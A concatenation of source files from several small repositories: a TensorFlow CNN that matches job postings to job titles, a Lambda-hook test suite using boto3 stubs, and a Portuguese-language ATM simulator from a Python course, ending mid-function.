Prepare the test set for the network.
"""
# Preprocess data
titles = [dh.clean_custom(x).split() for x in titles]
job_post = dh.clean_custom(job_post).split()
job_post = job_post[:max_len]
# Pad sentences
x_u = [dh.pad_sentences(job_post, max_len)]
x_r = [[dh.pad_sentences(x, max_len) for x in titles]]
# Load tokens and pretrained embeddings
we_file = "/".join(config.config["word_embeddings_file"].split("/")[1:])
voc_size = config.config["vocabulary_size"]
embedding_size = config.config["embedding_size"]
tokens, U = dh.get_pretrained_wordvec_from_file(we_file, (voc_size, embedding_size))
# Represent sentences as list(nparray) of ints
dctize = lambda word: tokens[word] if tokens.has_key(word) else tokens["pad"]
dctizes = lambda words: map(dctize, words)
dctizess = lambda wordss: map(dctizes, wordss)
x_u_i = np.array(map(dctizes, x_u))
x_r_i = np.array(map(dctizess, x_r))
return (x_u_i, x_r_i, max_len, U)
CHECKPOINT_DIR = "/home/pierre/Documents/Upwork/Code/job-knowledge-extraction/training/sent_cnn_model/runs/1514285552/checkpoints/"
# TODO freeze model.
with tf.Session() as sess:
saver = tf.train.import_meta_graph(os.path.join(CHECKPOINT_DIR, "sent_cnn_3_8-200.meta"))
saver.restore(sess, tf.train.latest_checkpoint(CHECKPOINT_DIR))
print "Model has been restored"
job_post = "ameria closed joint stock company is seeking a person to provide secretarial and administrative support to the office lobby"
titles = ["Factory Worker", "Chief Financial Officer" ,"receptionist", "Software Developer", "Chief Accountant/ Finance Assistant", "UI Designer"]
graph = tf.get_default_graph()
max_len = graph.get_tensor_by_name("sequence_length:0")
max_len = sess.run(max_len)
x_u_i, x_r_i, max_len, U = format_data_for_testing(job_post, titles, max_len=max_len)
input_x_u = graph.get_tensor_by_name("input_x_u:0")
input_x_r = graph.get_tensor_by_name("input_x_r:0")
dropout_keep_prob = graph.get_tensor_by_name("dropout_keep_prob:0")
predictions = graph.get_tensor_by_name("cosine_layer/predictions:0")
y = sess.run(predictions, feed_dict={input_x_u: x_u_i, input_x_r: x_r_i, dropout_keep_prob: 1})
print y<file_sep># Sent_CNN
This is the DSSM version based on Word Embeddings and Convolutional Layers.
### I Prepare the Dataset
Dowload the Kaggle job post dataset [here](https://www.kaggle.com/madhab/jobposts/downloads/online-job-postings.zip) and save it into the `data` folder.
Download the pretrain word embedding [here](https://worksheets.codalab.org/rest/bundles/0x15a09c8f74f94a20bec0b68a2e6703b3/contents/blob/) and save it into the folder `data/word_representations` with the name `glove.6B.100d.txt`
Run the sent_cnn_data_helpers, that will execute the `job_posting_data_preprocessing` function. This will create your formated dataset into the data folder as `job_post_preprocessed.tsv`
``` sh
cd {ROOT_DIR}/preprocessing
python sent_cnn_data_helpers.py
```
### II Train
To train the network run:
``` sh
cd {ROOT_DIR}/training/sent_cnn_model
python train_cnn.py
```
Sometimes we observe unstability during the training for some datasets. If this happens you can try to change the input dataset by changing the number
of words per job. (here 50). Taking all the words or 50 words looks stable where taking 100 words is unstable.
``` python
job_description = " ".join(np_data[index][0].split()[:50])
```
You can monitor your training on tensorboard by running:
``` sh
tensorboard --logdir runs/{YOURUNNUMBER}
```
> You can also run this on the question/topics dataset which is giving really good results (>92% accuracy on the validation set). You can download it [here](https://raw.githubusercontent.com/scottyih/STAGG/master/webquestions.examples.train.e2e.top10.filter.patrel.sid.tsv)<file_sep>import numpy as np
import re
import os
import sys
sys.path.append(os.path.normpath(os.path.join(os.path.abspath(__file__), "../../")))
import training.sent_cnn_model.config as config
def get_evaluation_examples_for_sent2vec(training_file_name, n_neg_sample=5):
neg_dict = {}
wqn_lst = []
x_u = []
x_r = []
y = []
with open(training_file_name) as tf:
for lines in tf:
# data -> [f1, u_str, r_str, WQ_NUM]
data = lines.split('\t')
f1 = float(data[0])
u_str = clean_str(data[1].strip())
r_str = data[2].strip()
wqn = data[3].strip()
if f1 >= 0.5:
wqn_lst.append(wqn)
x_u.append(u_str)
x_r.append([r_str])
else:
if neg_dict.has_key(wqn):
if len(neg_dict[wqn]) < n_neg_sample:
neg_dict[wqn].append(r_str)
else:
neg_dict[wqn] = [r_str]
for i in range(len(x_u)):
if not neg_dict.has_key(wqn_lst[i]):
neg_dict[wqn_lst[i]] = neg_dict[wqn_lst[0]]
if len(neg_dict[wqn_lst[i]]) < n_neg_sample:
neg_dict[wqn_lst[i]] += neg_dict[wqn_lst[0]][:n_neg_sample - len(neg_dict[wqn_lst[i]])]
if len(neg_dict[wqn_lst[i]]) != n_neg_sample:
print neg_dict[wqn_lst[i]]
x_r[i] = x_r[i] + neg_dict[wqn_lst[i]]
# add a little randomness
y.append(np.random.randint(len(x_r[i])))
tmp = x_r[i][0]
x_r[i][0] = x_r[i][y[i]]
x_r[i][y[i]] = tmp
with open("sent2vec.eval", 'w') as f:
for i, xu in enumerate(x_u):
for xr in x_r[i]:
line = ""
line = xu + '\t' + re.sub(r"\.", " ", xr) + '\n'
f.write(line)
return x_u, x_r, y
def get_training_examples(training_file_name, n_neg=5000):
"""
Load training data file, and split the data into words and labels.
Return utterances, relation words,
labels and the largest length of training sentences.
"""
positive_utterances = []
positive_relations = []
negative_utterances = []
negative_relations = []
max_len = 0
with open(training_file_name) as tf:
for lines in tf:
# data -> [f1, u_str, r_str, WQ_NUM]
data = lines.split('\t')
f1 = float(data[0])
u_str = clean_str(data[1].strip()).split(" ")
r_str = clean_str(data[2].strip()).split(" ")
max_len = max(len(u_str), len(r_str), max_len)
if f1 >= 0.5:
positive_utterances.append(u_str)
positive_relations.append(r_str)
elif f1 == 0:
negative_utterances.append(u_str)
negative_relations.append(r_str)
samples = np.random.choice(len(negative_utternaces), n_neg, replace=False)
negative_utternaces = [negative_utternaces[i] for i in samples]
negative_relations = [negative.relations[i] for i in samples]
x_u = positive_utterances + negative_utterances
x_r = positive_relations + negative_relations
positive_labels = np.ones(len(positive_pairs))
negative_labels = np.ones(len(negative_pairs))
y = np.concatenate((positive_labels, negative_labels))
return (x_u, x_r, y, max_len)
def get_training_examples_for_softmax(training_file_name, n_neg_sample=5, double_net=False):
"""
Load training data file, and split the data into words and labels.
Return utterances, relation words,
labels and the largest length of training sentences.
The output of this funtion is formatted for softmax regression.
"""
neg_dict = {}
max_len = 0
max_len_u = 0
max_len_r = 0
wqn_lst = []
x_u = [] # Question
x_r = [] # [[[topics2], [topicspos2].. etc]]
y = [] # [id_of_the_good_topic_sequence]
with open(training_file_name) as tf:
for lines in tf:
# data -> [f1, u_str, r_str, WQ_NUM]
data = lines.split('\t')
f1 = float(data[0])
u_str = clean_str(data[1].strip()).split(" ")
r_str = clean_str(data[2].strip()).split(" ")
wqn = data[3].strip()
max_len = max(len(u_str), len(r_str), max_len)
max_len_u = max(len(u_str), max_len_u)
max_len_r = max(len(r_str), max_len_r)
if f1 >= 0.5:
wqn_lst.append(wqn)
x_u.append(u_str)
x_r.append([r_str])
else:
if neg_dict.has_key(wqn):
if len(neg_dict[wqn]) < n_neg_sample:
neg_dict[wqn].append(r_str)
else:
neg_dict[wqn] = [r_str]
for i in range(len(x_u)):
if not neg_dict.has_key(wqn_lst[i]):
neg_dict[wqn_lst[i]] = neg_dict[wqn_lst[0]]
if len(neg_dict[wqn_lst[i]]) < n_neg_sample:
# TODO: Add some randomness to this selection process
neg_dict[wqn_lst[i]] += neg_dict[wqn_lst[0]][:n_neg_sample - len(neg_dict[wqn_lst[i]])]
if len(neg_dict[wqn_lst[i]]) != n_neg_sample:
print neg_dict[wqn_lst[i]]
x_r[i] = x_r[i] + neg_dict[wqn_lst[i]]
# add a little randomness
y.append(np.random.randint(len(x_r[i])))
tmp = x_r[i][0]
x_r[i][0] = x_r[i][y[i]]
x_r[i][y[i]] = tmp
if double_net:
return (x_u, x_r, y, max_len_u, max_len_r)
return (x_u, x_r, y, max_len)
def clean_str(string):
"""
Tokenization/string cleaning for all datasets except for SST.
Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py
"""
string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)
string = re.sub(r"\'s", " \'s", string)
string = re.sub(r"\'ve", " \'ve", string)
string = re.sub(r"n\'t", " n\'t", string)
string = re.sub(r"\'re", " \'re", string)
string = re.sub(r"\'d", " \'d", string)
string = re.sub(r"\'ll", " \'ll", string)
string = re.sub(r",", " , ", string)
string = re.sub(r"!", " ! ", string)
string = re.sub(r"\(", " \( ", string)
string = re.sub(r"\)", " \) ", string)
string = re.sub(r"\?", " \? ", string)
string = re.sub(r"\s{2,}", " ", string)
return string.strip().lower()
def pad_sentences(sentence, length, padding_word="pad"):
"""
Pad a sentence to a given length.
"""
num_padding = length - len(sentence)
new_sentence = sentence + [padding_word] * num_padding
return new_sentence
def get_pretrained_wordvec_from_file(wf, dim):
"""
Get the pre-trained word representations from local file(s).
@param wf: path to the file
@type wf: str
@param dim: the dimension of embedding matrix.
@type dim: tuple
@return (tokens, U): tokens row dict and words embedding matrix.
@rtype : tuple of (dict, nparray)
"""
tokens = {}
U = np.zeros(dim)
with open(wf) as f:
for inc, lines in enumerate(f):
tokens[lines.split()[0]] = inc
U[inc] = np.array(map(float, lines.split()[1:]))
if inc == dim[0]:
break
return tokens, U
import pandas as pd
import random
def clean_custom(to_process):
to_process = to_process.lower()
to_process = to_process.replace("\n", " ") # take off \n at the end of line
to_process = re.sub(r'[^\w\s]', ' ', to_process) # replace punctuation with ' '
to_process = "".join([c for c in to_process if (c.isalnum() or c == " ")]) # take off all non alnum char
to_process = " ".join(to_process.split()) # Remove multiple spaces and join with * "a
return to_process
def job_posting_data_preprocessing(input_file_path):
data = pd.read_csv(input_file_path)
data = data[["JobDescription", "Title"]]
print data.count()
data = data.dropna(axis=0, how='any')
print data.count()
np_data = data.as_matrix()
with open(os.path.join(os.path.dirname(input_file_path), "job_post_preprocessed.tsv"), "w") as f:
for index in range(np_data.shape[0]):
# Cutting job post after max_length words (Simple case for now see the config file)
title = np_data[index][1]
title = clean_custom(title).replace(" ", ".")
job_description = clean_custom(np_data[index][0])
job_description = " ".join(job_description.split()[:config.config["max_len"]]) if config.config["max_len"] is not None else " ".join(job_description.split())
random_sampling = []
while len(random_sampling) != 10 or index in random_sampling or len(set(random_sampling)) != 10:
random_sampling = [random.randrange(0, np_data.shape[0]) for x in range(10)]
random_sampling = [clean_custom(np_data[x][1]).replace(" ", ".") for x in random_sampling]
random_sampling = zip([title] + random_sampling, [1] + [0]* 10)
random.shuffle(random_sampling)
[f.write(str(x[1]) + "\t" + job_description + "\t" + x[0] + "\t" + "WebQTrn-{}".format(index) + "\n") for x in random_sampling]
if index % 1000 == 0:
print "Processing {} on {} examples".format(index, np_data.shape[0])
if __name__ == "__main__":
# tokens, U = get_pretrained_wordvec_from_file("./data/word_representations/glove.6B.100d.txt", (400000, 100))
job_posting_data_preprocessing("../data/data job posts.csv")<file_sep>scipy==1.0.0
numpy==1.13.3
pandas==0.21.1
scikit-learn==0.19.1
<file_sep>import numpy as np
import tensorflow as tf
import datetime
import time
import os
import sys
sys.path.append(os.path.normpath(os.path.join(os.path.abspath(__file__), "../../../")))
import preprocessing.sent_cnn_data_helpers as dh
import double_net_sent_cnn
import sent_cnn
import config
def load_data(config):
"""
Load training examples and pretrained word embeddings from disk.
Return training inputs, labels and pretrianed embeddings.
"""
# Load raw data
wq_file = config["data_file"]
n_neg_sample = config["num_classes"] - 1
x_u, x_r, y, max_len = dh.get_training_examples_for_softmax(wq_file, n_neg_sample)
# Pad sentences
pad = lambda x: dh.pad_sentences(x, max_len)
pad_lst = lambda x: map(pad, x)
x_u = map(pad, x_u)
x_r = map(pad_lst, x_r)
# Load tokens and pretrained embeddings
we_file = config["word_embeddings_file"]
voc_size = config["vocabulary_size"]
embedding_size = config["embedding_size"]
tokens, U = dh.get_pretrained_wordvec_from_file(we_file, (voc_size, embedding_size))
# Represent sentences as list(nparray) of ints
dctize = lambda word: tokens[word] if tokens.has_key(word) else tokens["pad"]
dctizes = lambda words: map(dctize, words)
dctizess = lambda wordss: map(dctizes, wordss)
x_u_i = np.array(map(dctizes, x_u))
x_r_i = np.array(map(dctizess, x_r))
y = np.array(y)
return (x_u_i, x_r_i, y, max_len, U)
def load_data_double_net(config):
"""
Load training examples and pretrained word embeddings from disk.
Return training inputs, labels and pretrianed embeddings.
"""
# Load raw data
wq_file = config["data_file"]
n_neg_sample = config["num_classes"] - 1
x_u, x_r, y, max_len_u, max_len_r = dh.get_training_examples_for_softmax(wq_file, n_neg_sample, double_net=True)
# Pad sentences
x_u = [dh.pad_sentences(x, max_len_u) for x in x_u]
x_r = [[dh.pad_sentences(u, max_len_r) for u in x] for x in x_r]
# Load tokens and pretrained embeddings
we_file = config["word_embeddings_file"]
voc_size = config["vocabulary_size"]
embedding_size = config["embedding_size"]
tokens, U = dh.get_pretrained_wordvec_from_file(we_file, (voc_size, embedding_size))
# Represent sentences as list(nparray) of ints
dctize = lambda word: tokens[word] if tokens.has_key(word) else tokens["pad"]
dctizes = lambda words: map(dctize, words)
dctizess = lambda wordss: map(dctizes, wordss)
x_u_i = np.array(map(dctizes, x_u))
x_r_i = np.array(map(dctizess, x_r))
y = np.array(y)
return (x_u_i, x_r_i, y, {"max_len_u": max_len_u, "max_len_r": max_len_r}, U)
def train_cnn(x_u_i, x_r_i, y, max_len, U, config, debug=True):
if config["double_net"]:
cnn = double_net_sent_cnn.SentCNN(doc_sequence_length=max_len["max_len_u"],
query_sequence_length=max_len["max_len_r"],
num_classes=config["num_classes"],
init_embeddings=U,
filter_sizes=config["filter_sizes"],
num_filters=config["num_filters"],
batch_size=config["batch_size"],
embeddings_trainable=config["embeddings_trainable"],
l2_reg_lambda=config["l2_reg_lambda"])
print "Training double_net_sent_cnn..."
else:
cnn = sent_cnn.SentCNN(sequence_length=max_len,
num_classes=config["num_classes"],
init_embeddings=U,
filter_sizes=config["filter_sizes"],
num_filters=config["num_filters"],
batch_size=config["batch_size"],
embeddings_trainable=config["embeddings_trainable"],
l2_reg_lambda=config["l2_reg_lambda"])
print "Training classic sent_cnn..."
total_iter = config["total_iter"]
batch_size = config["batch_size"]
global_step = tf.Variable(0, name="global_step", trainable=True)
optimizer = tf.train.AdamOptimizer()
grads_and_vars = optimizer.compute_gradients(cnn.loss)
capped_gvs = grads_and_vars#[(tf.clip_by_value(gv[0], -55.0, 55.0), gv[1]) if gv[0] is not None else
#gv for gv in grads_and_vars]
train_op = optimizer.apply_gradients(grads_and_vars, global_step=global_step)
val_size = config["val_size"]
x_u_val = x_u_i[:val_size]
x_u_train = x_u_i[val_size+1:]
x_r_val = x_r_i[:val_size]
x_r_train = x_r_i[val_size+1:]
y_val = y[:val_size]
y_train = y[val_size+1:]
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
# summary
#grad_summaries = []
#for g, v in grads_and_vars:
# if g is not None:
# grad_hist_summary = tf.histogram_summary("{}/grad/hist".format(v.name), g)
# sparsity_summary = tf.scalar_summary("{}/grad/sparsity".format(v.name), tf.nn.zero_fraction(g))
# grad_summaries.append(grad_hist_summary)
# grad_summaries.append(sparsity_summary)
#grad_summaries_merged = tf.merge_summary(grad_summaries)
# Output directory for models and summaries
timestamp = str(int(time.time()))
out_dir = os.path.abspath(os.path.join(os.path.curdir, "runs", timestamp))
print("Writing to {}\n".format(out_dir))
# Summaries for loss and accuracy
loss_summary = tf.summary.scalar("loss", cnn.loss)
acc_summary = tf.summary.scalar("accuracy", cnn.accuracy)
# Train Summaries
train_summary_op = tf.summary.merge([loss_summary, acc_summary])
train_summary_dir = os.path.join(out_dir, "summaries", "train")
train_summary_writer = tf.summary.FileWriter(train_summary_dir, sess.graph)
# Dev summaries
dev_summary_op = tf.summary.merge([loss_summary, acc_summary])
dev_summary_dir = os.path.join(out_dir, "summaries", "dev")
dev_summary_writer = tf.summary.FileWriter(dev_summary_dir, sess.graph)
# Checkpoint directory. Tensorflow assumes this directory already exists so we need to create it
if debug==False:
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
checkpoint_prefix = os.path.join(checkpoint_dir, "sent_cnn")
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
saver = tf.train.Saver()
for _ in range(total_iter):
indices = np.random.choice(len(x_u_train), batch_size)
x_u_batch = x_u_train[indices]
x_r_batch = x_r_train[indices]
y_batch = y_train[indices]
# Training procedures
feed_dict = {
cnn.input_x_u: x_u_batch,
cnn.input_x_r: x_r_batch,
cnn.input_y: y_batch,
cnn.dropout_keep_prob:config["dropout_keep_prob"]
}
if debug == False:
_, step, summaries, loss, accuracy, u, r, dot, su, sr, cosine = sess.run(
[train_op, global_step, train_summary_op, cnn.loss, cnn.accuracy, cnn.h_dropped_u,
cnn.h_dropped_r, cnn.dot, cnn.sqrt_u, cnn.sqrt_r, cnn.cosine], feed_dict)
else:
_, step, loss, accuracy, u, r, dot, su, sr, cosine, undropped = sess.run(
[train_op, global_step, cnn.loss, cnn.accuracy, cnn.h_dropped_u,
cnn.h_dropped_r, cnn.dot, cnn.sqrt_u, cnn.sqrt_r, cnn.cosine, cnn.h_features], feed_dict)
gvs = sess.run([gv[0] if gv[0] is not None else cnn.loss for gv in capped_gvs], feed_dict)
time_str = datetime.datetime.now().isoformat()
if debug == False:
train_summary_writer.add_summary(summaries, step)
if step != 0 and step % 50 == 0:
feed_dict = {
cnn.input_x_u: x_u_val,
cnn.input_x_r: x_r_val,
cnn.input_y: y_val,
cnn.dropout_keep_prob:1
}
if debug == False:
dev_loss, dev_accuracy, summaries = sess.run(
[cnn.loss, cnn.accuracy, train_summary_op], feed_dict)
else:
dev_loss, dev_accuracy = sess.run(
[cnn.loss, cnn.accuracy], feed_dict)
print("{}: step {}, train loss {:g}, train acc {:g}, dev loss {:g}, dev acc {:g}".format(
time_str, step, loss, accuracy, dev_loss, dev_accuracy))
#print gvs
'''print undropped
print "----------------------------------"
print u
print "----------------------------------"
print r
print "----------------------------------"
print dot
print "----------------------------------"
print su
print "----------------------------------"
print sr
print "----------------------------------"
print cosine'''
if debug == False:
if dev_summary_writer:
dev_summary_writer.add_summary(summaries, step)
# Saving checkpoints. TODO: save the meta file only once.
if step != 0 and step % config["checkpoint_step"] == 0:
checkpoint_name = checkpoint_prefix + "_{}_{}".format(len(config["filter_sizes"]), config["num_filters"], step)
saver.save(sess, checkpoint_name, global_step=step)
if __name__=="__main__":
if not config.config["double_net"]:
# Load Data for sent_cnn
x_u_i, x_r_i, y, max_len, U = load_data(config.config)
else:
# Load Data for double_net_sent_cnn
x_u_i, x_r_i, y, max_len, U = load_data_double_net(config.config)
train_cnn(x_u_i, x_r_i, y, max_len, U, config.config, debug=False)<file_sep># job-knowledge-extraction
There are three main modules
- preprocessing: classes and methods for data pre-processing (e.g., implement word2vec to generate lookup tables).
- training: main classes and methods for training the model.
- testing: unit tests and validation methods.
<file_sep>config = {
"data_file": "../../data/job_post_preprocessed.tsv",
"word_embeddings_file": "../../data/word_representations/glove.6B.100d.txt",
"vocabulary_size": 400000,
"embedding_size": 100,
"num_classes": 6,
"filter_sizes": [5],
"num_filters": 200, # Ideally 256 to 1000
"dropout_keep_prob": 0.85,
"embeddings_trainable": True,
"total_iter": 100000,
"batch_size": 256,
"val_size": 1000,
"l2_reg_lambda": 0.1,
"checkpoint_step": 300,
"max_len": 50,
"double_net": True
}
|
6f3aa3bc57ee2f9d692bd58426bf47ceb22b76f9
|
[
"Markdown",
"Python",
"Text"
] | 8 |
Python
|
upwork-ds/job-knowledge-extraction
|
d31cdeff8d3a100569f93faf9c8512093b3390a3
|
7ec0192f201177dd932be0d5ce7ccf15542ae64e
|
refs/heads/master
|
<repo_name>phobologic/stacker-python-bug-squash<file_sep>/requirements.txt
botocore
boto3
testfixtures
formic
nose
<file_sep>/lambda_hook/tests/test_lambda.py
import unittest
from StringIO import StringIO
from zipfile import ZipFile
import botocore
from botocore.stub import Stubber
import boto3
from testfixtures import TempDirectory, compare
from .. import aws_lambda
REGION = "us-east-1"
ALL_FILES = (
'f1/f1.py',
'f1/f1.pyc',
'f1/__init__.py',
'f1/test/__init__.py',
'f1/test/f1.py',
'f1/test/f1.pyc',
'f1/test2/test.txt',
'f2/f2.js'
)
F1_FILES = [p[3:] for p in ALL_FILES if p.startswith('f1')]
F2_FILES = [p[3:] for p in ALL_FILES if p.startswith('f2')]
BUCKET_NAME = "myBucket"
class TestLambdaHooks(unittest.TestCase):
def setUp(self):
self.s3 = boto3.client("s3")
self.stubber = Stubber(self.s3)
@classmethod
def temp_directory_with_files(cls, files=ALL_FILES):
d = TempDirectory()
for f in files:
d.write(f, '')
return d
def assert_zip_file_list(self, zip_file, files):
found_files = set()
for zip_info in zip_file.infolist():
perms = (
zip_info.external_attr & aws_lambda.ZIP_PERMS_MASK
) >> 16
self.assertIn(perms, (0755, 0644),
'ZIP member permission must be 755 or 644')
found_files.add(zip_info.filename)
compare(found_files, set(files))
def assert_s3_zip_file_list(self, bucket, key, files):
object_info = self.s3.get_object(Bucket=bucket, Key=key)
zip_data = StringIO(object_info['Body'].read())
with ZipFile(zip_data, 'r') as zip_file:
self.assert_zip_file_list(zip_file, files)
def test_ensure_bucket_bucket_exists(self):
self.stubber.add_response("head_bucket", {})
with self.stubber:
aws_lambda._ensure_bucket(self.s3, BUCKET_NAME)
def test_ensure_bucket_bucket_doesnt_exist_create_ok(self):
self.stubber.add_client_error(
"head_bucket",
service_error_code="404",
http_status_code="404"
)
self.stubber.add_response(
"create_bucket",
{"Location": "/%s" % BUCKET_NAME}
)
with self.stubber:
aws_lambda._ensure_bucket(self.s3, BUCKET_NAME)
def test_ensure_bucket_bucket_doesnt_exist_access_denied(self):
self.stubber.add_client_error(
"head_bucket",
service_error_code="401",
http_status_code="401"
)
with self.stubber:
with self.assertRaises(botocore.exceptions.ClientError):
aws_lambda._ensure_bucket(self.s3, BUCKET_NAME)
def test_ensure_bucket_unhandled_error(self):
self.stubber.add_client_error(
"head_bucket",
service_error_code="500",
http_status_code="500"
)
with self.stubber:
with self.assertRaises(botocore.exceptions.ClientError) as cm:
aws_lambda._ensure_bucket(self.s3, BUCKET_NAME)
exc = cm.exception
self.assertEquals(exc.response["Error"]["Code"], "500")
if __name__ == "__main__":
unittest.main()
|
3c184a68d55c1b6903b732f80a59a2e3e1c26673
|
[
"Python",
"Text"
] | 2 |
Text
|
phobologic/stacker-python-bug-squash
|
f9b226efb018c1942ccc1e674c42f474db7f105e
|
11fa02e95b69bc4ab9c56b3a809612da0423489b
|
refs/heads/master
|
<file_sep>use missamore;
# Write a query that returns the company_id, company name, the number of resumes submitted
# to that company, and the average gpa of the resumes the submitted, and the number of people
# that were hired.
# Save the query as a VIEW as company_resume_statistics.
create or replace view company_resume_statistics as
select c.company_id, c.company_name, COUNT(resume_id), avg_company_gpa(company_name)
from resume_company rc
join company c ON rc.company_id=c.company_id
GROUP BY c.company_id;
#3 Create a stored procedure that uses the VIEW, takes in a company id as it’s only input and
# returns the information for the given company.
DROP PROCEDURE IF EXISTS company_id_statisics;
DELIMITER //
CREATE PROCEDURE company_id_statistics (_company_id varchar(255))
BEGIN
SELECT * FROM company_resume_statistics where company_id = _company_id;
END //
DELIMITER ;
# CALLS THE PROCEDURE
CALL company_id_statistics(1);
#Create a stored procedure that uses the VIEW and returns companies who have an average gpa
#greater than or equal to the input value.
DROP PROCEDURE IF EXISTS company_avg_gpa;
DELIMITER //
CREATE PROCEDURE company_avg_gpa (_avg_gpa int)
BEGIN
SELECT * FROM company_resume_statistics where avg_company_gpa(company_name) >= _avg_gpa;
END //
DELIMITER ;
#CALLS THE FUNCTION
call company_avg_gpa(3);
|
f12d62d5db054abe80ad50285bd1245217c4f230
|
[
"SQL"
] | 1 |
SQL
|
joemissamore/lab09
|
43dff7495e00867b265ba81cfa4d1f9dbf8a33d5
|
bf384dddee5c2633d88c1b78ac72a39378769e68
|
refs/heads/master
|
<repo_name>omargobran/NewsFly-ReactNative-App<file_sep>/config.js
export const firebaseConfig = {
apiKey: "<KEY>",
authDomain: "my-new-project-111.firebaseapp.com",
databaseURL: "https://my-new-project-111.firebaseio.com/",
projectId: "my-new-project-111",
storageBucket: "my-new-project-111.appspot.com",
messagingSenderId: "161293357263",
appId: "1:161293357263:web:579fe0262a03f8db"
};
|
a679d4f39cc696b5b5bf08352f6d5a3168d7a6f6
|
[
"JavaScript"
] | 1 |
JavaScript
|
omargobran/NewsFly-ReactNative-App
|
2dbba8932b1db4eff62c249698fc0e7e3228f200
|
7de43d77255ded4feefb8bbbfec4a337bd988a32
|
refs/heads/master
|
<file_sep>from utils import header
from open_file_bank import open_file_bank,write_money_slips
def main():
header()
make_money_slips()
def make_money_slips():
file=open_file_bank('w')
write_money_slips(file)
file.close()
main()
<file_sep>import os
from bank_account_variables import accounts_list,money_slips
def open_file_bank(mode):
BASE_PATH=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
return open(BASE_PATH+'/files/_bank_file.dat',mode)
def write_money_slips(file):
for money_bill,value in money_slips.items():
file.write(money_bill+'='+str(value)+';')
def read_money_slips(file):
line=file.readline()
while line.find(';')!= -1:
semicolon_pos=line.find(';')
money_bill_value=line[0:semicolon_pos]
set_money_bill_value(money_bill_value)
if semicolon_pos +1==len(line):
break
else:
line=line[semicolon_pos+1:len(line)]
def set_money_bill_value(money_bill_value):
equal_pos=money_bill_value.find('=')#20=10
money_bill=money_bill_value[0:equal_pos]
count_money_bill_value=len(money_bill_value)
value=money_bill_value[equal_pos+1:count_money_bill_value]
print(money_bill,value)
money_slips[money_bill]=int(value)
def load_bank_data():
open_file_bank('r'):
read_money_slips(file)
<file_sep>import os
#GET BASE PATH OF PROJECT
BASE_PATH=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
print(BASE_PATH)
#file=open(BASE_PATH+'/_file_test.dat','w') #write
#file.write('Marcos\tRoberto\n')
#file.write('Silvestrini')
#file.close()
# file=open(BASE_PATH+'/_file_test.dat','a') #append
# file.write('Marcos\tRoberto\n')
# file.write('Silvestrini\n')
# file.writelines(('test1','test2','test2','test2\n'))
# file.writelines(['test1','test2','test2','test2\n'])
# file.close()
file=open(BASE_PATH+'/_file_test.dat','r') #read
# print(file.read())
# print('\n')
# print(file.read(10))
# print(file.readline())
# print(file.readline(6))
# print(file.readline(2))
# print(file.readline())
#lines=file.readlines()
#for line in lines:
# print(line)
line=file.readline()
while line:
line=file.readline()
print(line)
file.close()<file_sep>import os
def header ():
print(" ")
print("***********************************************************")
print("********** School of Net - Caixa Eletronico *************")
print("***********************************************************")
print(" ")
def clear():
clear= 'cls' if os.name=='nt' else 'clear'
os.system(clear)
def pause():
input("Pressione <ENTER> para Continuar...")
<file_sep>import os
print(' ')
print(os.path.abspath('.'))
print(os.path.abspath('..'))
print(os.path.abspath('./test/test_path.py'))
print(os.path.abspath('./test'))
print(' ')
path_test_file=os.path.abspath('./test/test_path.py')
print(path_test_file)
print(os.path.dirname(path_test_file))
print(os.path.exists(path_test_file +'test'))
print(os.path.isfile(path_test_file))
print(os.path.isdir(path_test_file))
print(' ')
print(__file__)
print(os.path.abspath(__file__))
path=(os.path.dirname(os.path.abspath(__file__)))
print(path)
BASE_PATH=os.path.abspath(./path)
print(BASE_PATH)<file_sep># course_python
Course Python School Of Net
<file_sep>from modules import utils
from modules import operations
#from modules.bank_account_variables import money_slips
#from modules.open_file_bank import load_bank_data
def main():
#load_bank_data()
#print(money_slips)
utils.header()
account_auth=operations.auth_account()
if account_auth:
utils.clear()
utils.header()
option_typed=operations.get_menu_options_typed(account_auth)
operations.do_operation(option_typed,account_auth)
else:
print("Conta Invalida, Tente Novamente!")
while True:
main()
utils.pause()
utils.clear() <file_sep>def call_numbers():
for number in range(0,10):
print(number)
def call_numbers_with_limit(limit):
list=range(0,10)
for number in range(limit) :
print(number)
#call_numbers()
call_numbers_with_limit(5)
def sum(x=0,y=0):
return x+y
def sub (x=0,y=0):
return x-y
def mult (x=0,y=0):
return x*y
def div (x,y):
if(y<1):
return 0
return x/y
print(sum(x=10,y=7))
print(sum())
print(div(x=-1,y=0))
print(div(x=50,y=3))
<file_sep>#from modules import bank_account_variables
import getpass
from bank_account_variables import accounts_list,money_slips
def do_operation(option_typed,account_auth):
if(option_typed == '1'):
show_balance(account_auth)
elif option_typed == '9' and accounts_list[account_auth]['admin']:
show_money_slips()
elif option_typed == '10' and accounts_list[account_auth]['admin']:
insert_money_slips()
elif option_typed == '2':
withdraw()
else:
print("Opção Invalida!")
def show_balance(account_auth):
print("Seu saldo é %s" % accounts_list[account_auth]['value'])
def show_money_slips():
print("Celulas Disponiveis no Caixa")
print(money_slips)
def insert_money_slips():
amount_typed=input("Digite a Quantidade de Cedulas: ")
money_bill_typed=input("Digite a Cedulas a ser Incluida: ")
money_slips[money_bill_typed]+=int(amount_typed)
print(money_slips)
def withdraw():
value_typed=input("Digite o Valor a ser Sacado: ")
money_slips_user={}
value_int=int(value_typed)
if value_int // 100 > 0 and value_int // 100 <= money_slips['100']:
money_slips_user['100']=value_int // 100
value_int=value_int - value_int // 100 * 100
if value_int // 50 > 0 and value_int // 50 <= money_slips['50']:
money_slips_user['50']=value_int // 50
value_int=value_int - value_int // 50 * 50
if value_int // 20 > 0 and value_int // 20 <= money_slips['20']:
money_slips_user['20']=value_int // 20
value_int=value_int - value_int // 20 * 20
if value_int != 0:
print("Cedulas indisponiveis para este Valor.")
print("Cedulas Disponiveis: 100,50,20")
else:
for money_bill in money_slips_user:
money_slips[money_bill]-=money_slips_user[money_bill]
print("Pegue as notas")
print(money_slips_user)
def auth_account():
account_typed=input('Digite o Numero da Conta: ')
password_typed=<PASSWORD>('Digite sua Senha: ')
if account_typed in accounts_list and password_typed == accounts_list[account_typed]['password']:
return account_typed
else:
return False
def get_menu_options_typed(account_auth):
print("1 - Saldo")
print("2 - Saque")
if accounts_list[account_auth]['admin']:
